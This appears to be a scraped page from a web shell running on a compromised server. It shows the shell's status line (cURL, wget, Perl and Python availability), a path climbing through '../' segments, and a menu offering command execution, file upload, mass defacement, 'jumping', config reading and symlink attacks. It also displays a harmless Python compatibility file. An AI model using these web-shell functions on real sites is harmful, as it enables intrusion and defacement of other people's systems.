OFF | cURL : OFF | WGET : ON | Perl : ON | Python : OFF Directory (0755) : /lib/python3/dist-packages/secretstorage/../DistUpgrade/../UpdateManager/../dbus/ |
Home | ☍ Command | ☍ Upload File | ☍Info Server | ☍ Buat File | ☍ Mass deface | ☍ Jumping | ☍ Config | ☍ Symlink | ☍ About |
---|
# Python 2 / Python 3 compatibility helpers. # SPDX-License-Identifier: MIT import sys is_py3 = (sys.version_info.major == 3) is_py2 = not is_py3